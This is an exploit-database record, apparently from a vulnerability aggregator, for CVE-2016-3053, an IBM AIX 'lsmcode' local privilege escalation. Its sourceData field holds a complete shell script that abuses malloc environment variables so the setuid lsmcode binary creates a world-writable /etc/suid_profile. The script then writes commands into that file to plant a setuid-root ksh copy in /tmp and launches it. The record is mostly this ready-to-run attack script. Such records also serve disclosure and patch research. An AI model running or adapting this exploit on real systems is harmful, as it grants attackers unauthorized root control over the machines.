{"id": "EDB-ID:40709", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation", "description": "", "published": "2016-11-04T00:00:00", "modified": "2016-11-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/40709", "reporter": "Hector X. Monsegur", "references": [], "cvelist": ["2016-3053"], "immutableFields": [], "lastseen": "2022-01-13T05:42:40", "viewCount": 29, "enchantments": {"dependencies": {}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceHref": "https://www.exploit-db.com/download/40709", "sourceData": "#!/usr/bin/sh\r\n#\r\n# AIX lsmcode local root exploit. \r\n#\r\n# Affected: AIX 6.1/7.1/7.2.0.2\r\n#\r\n# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/\r\n#\r\n# lqueryroot.sh by @hxmonsegur [2016 //RSL]\r\n\r\nROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')\r\n\r\nif [ ! -x \"/usr/sbin/lsmcode\" ]; then\r\n echo \"[-] lsmcode isn't executable. Exploit failed.\"\r\n exit 1\r\nfi\r\n\r\necho \"[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL\"\r\necho \"[*] Current id: `/usr/bin/id`\"\r\necho \"[*] Exporting variables\"\r\n\r\nMALLOCOPTIONS=buckets\r\nMALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile\r\nexport MALLOCOPTIONS MALLOCBUCKETS\r\n\r\necho \"[*] Setting umask to 000\"\r\numask 000\r\n\r\necho \"[*] Executing vulnerable binary [lsmcode]\"\r\n/usr/sbin/lsmcode -c >/dev/null 2>&1\r\n\r\nif [ ! -e \"/etc/suid_profile\" ]; then\r\n echo \"[-] /etc/suid_profile does not exist and exploit failed.\"\r\n exit 1\r\nfi\r\n\r\necho \"[*] Cleaning up /etc/suid_profile\"\r\necho > /etc/suid_profile\r\n\r\necho \"[*] Preparing escalation\"\r\ncat << EOF >/etc/suid_profile\r\ncp /bin/ksh $ROOTSHELL\r\n/usr/bin/syscall setreuid 0 0\r\nchown root:system $ROOTSHELL\r\nchmod 6755 $ROOTSHELL\r\nrm /etc/suid_profile\r\nEOF\r\n\r\necho \"[*] Cleaning up environment variables\"\r\nunset MALLOCBUCKETS MALLOCOPTIONS\r\n\r\necho \"[*] Escalating\"\r\n/usr/bin/ibstat -a >/dev/null 2>&1\r\n\r\nif [ ! -e \"$ROOTSHELL\" ]; then\r\n echo \"[-] Rootshell does not exist and exploit failed.\"\r\n exit 1\r\nfi\r\n\r\necho \"[*] Executing rootshell\"\r\n$ROOTSHELL\r\necho \"[*] Make sure to remove $ROOTSHELL\"", "osvdbidlist": [], "exploitType": "local", "verified": true, "_state": {"dependencies": 1647644799}}
{}
IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation